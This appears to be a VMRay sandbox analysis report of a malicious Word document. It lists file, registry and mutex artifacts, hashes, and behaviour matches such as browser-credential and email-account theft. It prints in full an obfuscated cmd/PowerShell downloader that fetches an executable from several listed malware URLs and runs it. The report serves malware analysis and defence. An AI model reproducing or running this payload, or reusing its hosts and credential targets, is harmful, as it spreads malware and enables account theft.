c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat dat File programdata\fb70.tmp programdata\fb70.tmp c:\ c:\programdata\fb70.tmp tmp WinRegistryKey Mozilla Firefox\bin INVALID WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe WinRegistryKey Mozilla Firefox 25.0\bin INVALID PathToExe File users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount oeaccount File users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount oeaccount File users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount c:\ c:\users\aetadzjz\appdata\local\microsoft\windows mail\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount oeaccount File programdata\fb2f.tmp programdata\fb2f.tmp c:\ c:\programdata\fb2f.tmp tmp WinRegistryKey Software\Qualcomm\Eudora\CommandLine HKEY_CURRENT_USER WinRegistryKey Software\Classes\Software\Qualcomm\Eudora\CommandLine\current HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Thunderbird HKEY_LOCAL_MACHINE WinRegistryKey Software\Google\Google Talk\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Google\Google Desktop\Mailboxes HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities HKEY_CURRENT_USER WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} HKEY_CURRENT_USER Username WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\15.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 User POP3 Server Display Name Email SMTP Server SMTP Port POP3 Port POP3 Use SPA POP3 Password IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_LOCAL_MACHINE WinRegistryKey Software\Group Mail HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\MSNMessenger HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\MessengerService HKEY_CURRENT_USER WinRegistryKey Software\Yahoo\Pager HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\IdentityCRL HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER File users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe c:\ c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe exe Mutex Global\I705BA84C Mutex Global\M705BA84C Analyzed Sample #20386 Malware Artifacts 20386 Sample-ID: #20386 Job-ID: #14428 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #20386 Submission-ID: #21233 C:\Users\aETAdzjz\Desktop\ihknzkjo.doc doc MD5 74008c237f9382ac5a6472d097687a8b SHA1 678dc05873c09fd280da2030aa630b0b42d986ad SHA256 607aa428401fe8e6d66583cdfc43a7879b1173c0d116a1e53ebd4e044511bfd1 Opened_By Metadata of Analysis for Job-ID #14428 Timeout False x86 64-bit 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) win7_64_sp1-mso2016 True 144.826 Windows 7 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "www.indpts.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\Public\3292.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"". Create process Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_history Read the browsing history for "Microsoft Internet Explorer". Read data related to browsing history Information Stealing VTI rule match with VTI rule score 4/5 vmray_readout_browser_credentials Possibly trying to readout browser credentials. Read browser data Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\I705BA84C". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\M705BA84C". Create system object